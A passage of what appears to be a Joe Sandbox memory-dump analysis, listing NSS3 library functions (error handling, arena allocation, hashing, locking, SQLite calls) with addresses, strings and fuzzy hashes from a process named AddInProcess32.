                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorInithtonlhtonsmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2409603077-0
                                                                                      • Opcode ID: 8bd7580335cc57d228fa3c1d2bd0386f0ebf42dd4d6c573c7c86e43bb3852fc8
                                                                                      • Instruction ID: d17574be991e1e0f58aaf7833c9cd2bacaff63e53d6cf234ee1713dba1b6123d
                                                                                      • Opcode Fuzzy Hash: 8bd7580335cc57d228fa3c1d2bd0386f0ebf42dd4d6c573c7c86e43bb3852fc8
                                                                                      • Instruction Fuzzy Hash: D0F0FE3264621079C7119FB49C80A97FB24EF42B78B23C316EB145BF95A631A404C2E5
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE89D,00000050,?,6CD43963,6CD89F84,?,6CD4394D,00000000,00000000,?,6CD43FBC,6CD89F88,00000000), ref: 6CD408A5
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_Unlock.NSS3(00000000,00000050,?,6CD43963,6CD89F84,?,6CD4394D,00000000,00000000,?,6CD43FBC,6CD89F88,00000000), ref: 6CD408AD
                                                                                      • ReleaseMutex.KERNEL32(00000000,?,6CD43963,6CD89F84,?,6CD4394D,00000000,00000000,?,6CD43FBC,6CD89F88,00000000), ref: 6CD408CC
                                                                                      • GetLastError.KERNEL32(?,6CD43963,6CD89F84,?,6CD4394D,00000000,00000000,?,6CD43FBC,6CD89F88,00000000), ref: 6CD408D6
                                                                                      • PORT_SetError_Util.NSS3(FFFFE89D,?,6CD43963,6CD89F84,?,6CD4394D,00000000,00000000,?,6CD43FBC,6CD89F88,00000000), ref: 6CD408ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorError_Util$LastMutexReleaseUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 4275090775-0
                                                                                      • Opcode ID: 8fbeda7dfebb40506533992c4a0b2714ed54ded1be96928217fc813c9d67c2e1
                                                                                      • Instruction ID: eadc3b9dcaffc80d34415e03e9ed603758a9064cd12cbc67f637288c0dcdb065
                                                                                      • Opcode Fuzzy Hash: 8fbeda7dfebb40506533992c4a0b2714ed54ded1be96928217fc813c9d67c2e1
                                                                                      • Instruction Fuzzy Hash: 18F0F431709254DAAB183BB99E00A5EB7AC8F116A97188326BB1EC6DE0CF20E44095E1
                                                                                      APIs
                                                                                      • PORT_InitCheapArena.NSS3(?,00000800,00000000,?,?,?,?,?,?,?,?,?,6CD0F916,00000000), ref: 6CD10AAE
                                                                                        • Part of subcall function 6CD1CA46: PL_InitArenaPool.NSS3(00000000,security,00000000,00000008,?,6CCE33EC,?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E), ref: 6CD1CA5E
                                                                                      • NSS_Get_SEC_ObjectIDTemplate_Util.NSS3(00000000,00000000,6CD0F906,00000000,?,?,?,?,?,?,?,?,?,6CD0F916,00000000), ref: 6CD10AC0
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,6CD0F906,00000000,?,?,?,?,?,?,?,?,?,6CD0F916,00000000), ref: 6CD10AD0
                                                                                        • Part of subcall function 6CD18A99: PORT_SetError_Util.NSS3(FFFFE08C,?,?,00000000), ref: 6CD18AE6
                                                                                      • SECOID_FindOIDTag_Util.NSS3(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,6CD0F916,00000000), ref: 6CD10AE0
                                                                                        • Part of subcall function 6CD29121: SECOID_FindOID_Util.NSS3(?,?,6CD18C2D,?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD29127
                                                                                      • PORT_DestroyCheapArena.NSS3(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,6CD0F916,00000000), ref: 6CD10AF5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$CheapFindInit$DecodeDestroyError_Get_Item_ObjectPoolQuickTag_Template_
                                                                                      • String ID:
                                                                                      • API String ID: 1079134730-0
                                                                                      • Opcode ID: b53242e55e6a99c548bb01e7e3b27f44f116cea54750b0c1aa9d4c68cc1ab822
                                                                                      • Instruction ID: 2dda8c0023c316b085fbfc4ef14100dd08e9d5d9977207aca25efc29d4f8fc12
                                                                                      • Opcode Fuzzy Hash: b53242e55e6a99c548bb01e7e3b27f44f116cea54750b0c1aa9d4c68cc1ab822
                                                                                      • Instruction Fuzzy Hash: BEF06873D482186ADB04E7E9AC46FDE73ACDB04624F104153FA14E7990FA64E51846E4
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,00000000,00000000,00000000,?,6CD13798,00000000,00000000,00000000,00000000,?,6CD11D4E,00000000,?,6CD11FB5,00000000), ref: 6CD11D6C
                                                                                      • PR_Unlock.NSS3(?,?,6CD13798,00000000,00000000,00000000,00000000,?,6CD11D4E,00000000,?,6CD11FB5,00000000,00000000,00000000,00000000), ref: 6CD11D7E
                                                                                      • PK11_FreeSlot.NSS3(?,00000000,00000000,00000000,?,6CD11D4E,00000000,?,6CD11FB5,00000000,00000000,00000000,00000000), ref: 6CD11D8F
                                                                                      • PORT_Free_Util.NSS3(00000000,?,00000000,00000000,00000000,?,6CD11D4E,00000000,?,6CD11FB5,00000000,00000000,00000000,00000000), ref: 6CD11D95
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,?,6CD13798,00000000,00000000,00000000,00000000,?,6CD11D4E,00000000,?,6CD11FB5,00000000,00000000), ref: 6CD11DA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_FreeFree_K11_LockSlotUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3493201928-0
                                                                                      • Opcode ID: d330604ab34d0fd7dd0367d07d231be8c04a4bc253f7d4a2be2db2c884143ea7
                                                                                      • Instruction ID: 6e473e5d57998f6fde0b1da96c24982667093dfe545b078c1d661034cac083f1
                                                                                      • Opcode Fuzzy Hash: d330604ab34d0fd7dd0367d07d231be8c04a4bc253f7d4a2be2db2c884143ea7
                                                                                      • Instruction Fuzzy Hash: FDF0BB3311C115AF9F019F65FC80999F779FF852743144229E52957E60DB32E855CAB0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD2BEF0
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CD2BF00
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000074,?), ref: 6CD2BF0B
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,?), ref: 6CD2BF1D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_ErrorError_Mark_Release_
                                                                                      • String ID:
                                                                                      • API String ID: 1828878761-0
                                                                                      • Opcode ID: e2e43ab6432b0110e81b5edd20fd160e0fd8651d72161fb791784339e4ed5b89
                                                                                      • Instruction ID: bdeef950aef02c4fa67d3f72bb2bb684f5d15c87c0ebfb37083f39a184404d6f
                                                                                      • Opcode Fuzzy Hash: e2e43ab6432b0110e81b5edd20fd160e0fd8651d72161fb791784339e4ed5b89
                                                                                      • Instruction Fuzzy Hash: 47F0E932A0C2147B97102F65AC80D9A77AC9FC166C714013AFB059AF60E766980446B4
                                                                                      APIs
                                                                                      • HASH_Create.NSS3(00000007), ref: 6CCEAC70
                                                                                        • Part of subcall function 6CCEAB06: PORT_Alloc_Util.NSS3(00000008), ref: 6CCEAB24
                                                                                      • HASH_Begin.NSS3(00000000), ref: 6CCEAC7D
                                                                                      • HASH_Update.NSS3(00000000,?,?,00000000), ref: 6CCEAC89
                                                                                      • HASH_End.NSS3(00000000,?,00000007,00000000,00000000,?,?,00000000), ref: 6CCEAC9A
                                                                                      • HASH_Destroy.NSS3(00000000,00000000,?,00000007,00000000,00000000,?,?,00000000), ref: 6CCEACA0
                                                                                        • Part of subcall function 6CCEAB50: PORT_Free_Util.NSS3(?), ref: 6CCEAB62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_BeginCreateDestroyFree_Update
                                                                                      • String ID:
                                                                                      • API String ID: 2041269493-0
                                                                                      • Opcode ID: 817bfaafdb537acbc9e3533a1b34a72ee49cfc00d1db1b068cc97840bd78d0b4
                                                                                      • Instruction ID: 41c3ae020c0788888d47f6509ca618cc1f5b2f5860188a2daa159571b91006ae
                                                                                      • Opcode Fuzzy Hash: 817bfaafdb537acbc9e3533a1b34a72ee49cfc00d1db1b068cc97840bd78d0b4
                                                                                      • Instruction Fuzzy Hash: 9BF0A731805829BF8B027E94DC00CEE3FB9AF4F6587004110F91455A20F732856597D5
                                                                                      APIs
                                                                                      • PR_EnterMonitor.NSS3(0520EF40,?,6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C2D
                                                                                      • CERT_ClearOCSPCache.NSS3(6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C3E
                                                                                        • Part of subcall function 6CCE7443: PR_EnterMonitor.NSS3 ref: 6CCE7449
                                                                                        • Part of subcall function 6CCE7443: PR_ExitMonitor.NSS3 ref: 6CCE7472
                                                                                      • PL_HashTableDestroy.NSS3(6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C49
                                                                                      • PR_ExitMonitor.NSS3(6CCEEA01,?,?,?,6CCEDF05), ref: 6CCE7C91
                                                                                      • PR_DestroyMonitor.NSS3(?,?,?,6CCEDF05), ref: 6CCE7C9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Monitor$DestroyEnterExit$CacheClearHashTable
                                                                                      • String ID:
                                                                                      • API String ID: 1185846456-0
                                                                                      • Opcode ID: 5596ed1775e0d4ba1f737cf81662ff08cea126056adfc00320b750a84ff396f4
                                                                                      • Instruction ID: 2e757549ab7a8606a7a4608b5ab3c152bc6c74e92d080d04ab40b27ed8a955a5
                                                                                      • Opcode Fuzzy Hash: 5596ed1775e0d4ba1f737cf81662ff08cea126056adfc00320b750a84ff396f4
                                                                                      • Instruction Fuzzy Hash: 69F0B2B1B33221ABEF919F68D88A5453FBDF70BB65712055AF21082248DB704085EBE8
                                                                                      APIs
                                                                                      • PR_Free.NSS3(00000000,?,?,6CCE0627,?,?,?,?,6CCE0F58,?,00000001,?,6CCDFE40,?), ref: 6CD168FA
                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,6CCE0627,?,?,?,?,6CCE0F58,?,00000001,?,6CCDFE40,?), ref: 6CD1690A
                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,6CCE0627,?,?,?,?,6CCE0F58,?,00000001,?,6CCDFE40,?), ref: 6CD1691A
                                                                                      • PR_DestroyLock.NSS3(?,?,?,6CCE0627,?,?,?,?,6CCE0F58,?,00000001,?,6CCDFE40,?), ref: 6CD16928
                                                                                      • PR_Free.NSS3(?,?,?,6CCE0627,?,?,?,?,6CCE0F58,?,00000001,?,6CCDFE40,?), ref: 6CD16930
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$CondFree$Lock
                                                                                      • String ID:
                                                                                      • API String ID: 1775378960-0
                                                                                      • Opcode ID: 9d291c88e48a1ed90b9f787d255a9dd2c847d7ed6c19c9e987ea8b80506f6f2f
                                                                                      • Instruction ID: ead585ef4a5aacfd9dc074c00314449d699406e7f6c1fd9739d5b5099a394853
                                                                                      • Opcode Fuzzy Hash: 9d291c88e48a1ed90b9f787d255a9dd2c847d7ed6c19c9e987ea8b80506f6f2f
                                                                                      • Instruction Fuzzy Hash: EAF0FE32115624DFEB161F60E8087D9BBF9FB09726F20441DE196918B0DB71A891DB50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __cftof
                                                                                      • String ID: $7$row value misused
                                                                                      • API String ID: 1622813385-3555774729
                                                                                      • Opcode ID: c93654be2bfeb5db55c0cf15f8882396d67639fde864f538693a0a86f8b731b1
                                                                                      • Instruction ID: 68b3021838d92426d528f095322e082b554cf1ebce46b3e5a22a17abe51cb705
                                                                                      • Opcode Fuzzy Hash: c93654be2bfeb5db55c0cf15f8882396d67639fde864f538693a0a86f8b731b1
                                                                                      • Instruction Fuzzy Hash: 6951D271D04209BFDF118FA9CC81BFE7BB8EF05358F148059F91866690E3359A54DBA1
                                                                                      APIs
                                                                                      • PORT_Free_Util.NSS3(?,?,00000000,00000000), ref: 6CD16F0B
                                                                                        • Part of subcall function 6CD1704F: PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CD1293C,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6CD1710E
                                                                                        • Part of subcall function 6CD17132: PORT_ArenaGrow_Util.NSS3(00000000,?,?,00000000,00000000,6CD4F836,00000000,?,6CD17876,6CD4F836,?,00000001,00000000,00000000,?,6CD4F836), ref: 6CD17167
                                                                                      Strings
                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&, xrefs: 6CD16E09, 6CD16E4F
                                                                                      • pkcs11:, xrefs: 6CD16DE2
                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=/?|, xrefs: 6CD16E8E, 6CD16EC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$ArenaGrow_
                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=/?|$pkcs11:
                                                                                      • API String ID: 2376419852-890694778
                                                                                      • Opcode ID: 9359794dea94642991b68b14171cc69050447fb35466d1397d53a0c0944a3603
                                                                                      • Instruction ID: b1844c347b55a0ff644f7fcec6cd4dfc6a917d458ae12cbbb31a88f9175c19db
                                                                                      • Opcode Fuzzy Hash: 9359794dea94642991b68b14171cc69050447fb35466d1397d53a0c0944a3603
                                                                                      • Instruction Fuzzy Hash: 69317472D08209ABE710DBB9ED90EDB73BCDB14258F04463AE905E2D65F734E609C6A1
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?,?,?,?,?,6CC6EFAD,?,?,?,?,?,?,6CC65052,?,?,?), ref: 6CCBCC9C
                                                                                      Strings
                                                                                      • bind on a busy prepared statement: [%s], xrefs: 6CCBCD52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_enter
                                                                                      • String ID: bind on a busy prepared statement: [%s]
                                                                                      • API String ID: 3053899952-326506900
                                                                                      • Opcode ID: ea35eaf4941f880a3a2df845c1c0b1dcdd48a15717122ff49ae65a70167d3e68
                                                                                      • Instruction ID: bb71b8fe2786ddd6e0e18cc3610b6f60d81be543e576e8e8303e732df605e04e
                                                                                      • Opcode Fuzzy Hash: ea35eaf4941f880a3a2df845c1c0b1dcdd48a15717122ff49ae65a70167d3e68
                                                                                      • Instruction Fuzzy Hash: 5B214935740522ABC7106BB9DDC4B9ABBA8FF45728F204166F409DBE90F7319856C7D0
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000400,00000000,6CD16F60,00000000,00000000,00000000), ref: 6CD16FF0
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000034,00000000,6CD16F60,00000000,00000000,00000000), ref: 6CD17003
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,6CD16F60,00000000,00000000,00000000), ref: 6CD17012
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena_$Alloc_ArenaErrorFree
                                                                                      • String ID: j4V'Y
                                                                                      • API String ID: 2885610252-1217605893
                                                                                      • Opcode ID: 2ce6d9e9b8deebea8ecbd6dad9d397e34d84355b3196bc525239dc4db59abbef
                                                                                      • Instruction ID: ac3e6fad56da5c8e749b95b1f806e1b478dcc9512a4bfd1f3e0dced00d7a24e7
                                                                                      • Opcode Fuzzy Hash: 2ce6d9e9b8deebea8ecbd6dad9d397e34d84355b3196bc525239dc4db59abbef
                                                                                      • Instruction Fuzzy Hash: 5CF0DBB261CA22BD73859B7CF800146E7A5EFC86603014575D600DE975D730DD85C6D2
                                                                                      APIs
                                                                                      • PR_CallOnce.NSS3(6CD88840,R), ref: 6CCC6EE8
                                                                                        • Part of subcall function 6CCD39BA: PR_Lock.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD39EE
                                                                                        • Part of subcall function 6CCD39BA: PR_NotifyAllCondVar.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD39FF
                                                                                        • Part of subcall function 6CCD39BA: PR_Unlock.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD3A0A
                                                                                      • PR_CreateIOLayerStub.NSS3(6CD887A8), ref: 6CCC6F16
                                                                                      • PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CCC6F2B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Layer$CallCondCreateLockNotifyOncePushStubUnlock
                                                                                      • String ID: R
                                                                                      • API String ID: 696995717-2121812343
                                                                                      • Opcode ID: f390a5695dfd424f8c3cadf910c3b4b0c384949892c90e0fb93695463fe7d1e3
                                                                                      • Instruction ID: 11e0c4492161a7a9bcaf72a04c493bc54a41a5cd6e7321dd74956ace57014b64
                                                                                      • Opcode Fuzzy Hash: f390a5695dfd424f8c3cadf910c3b4b0c384949892c90e0fb93695463fe7d1e3
                                                                                      • Instruction Fuzzy Hash: 1BF0963261AE11A7A6201629AD00AA777B9DF433757240B67F438D2ED0FB31984591A7
                                                                                      APIs
                                                                                      • LockFile.KERNEL32(?,00000000,00000000,00000000,000000FF,?,?,6CCC6032,?), ref: 6CCCECE7
                                                                                      • GetLastError.KERNEL32(?,6CCC6032,?), ref: 6CCCECF1
                                                                                        • Part of subcall function 6CCD0126: PR_SetError.NSS3(FFFFE896,?,?,6CCCE58F,00000000,?,6CCDA1DB,00000040,774CDF20,00000000,?,6CCD9F54,?,6CCC80C2,?), ref: 6CCD02F3
                                                                                      • PR_LogPrint.NSS3(_PR_MD_LOCKFILE() failed. Error: %d,00000000,?,6CCC6032,?), ref: 6CCCED11
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      Strings
                                                                                      • _PR_MD_LOCKFILE() failed. Error: %d, xrefs: 6CCCED0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
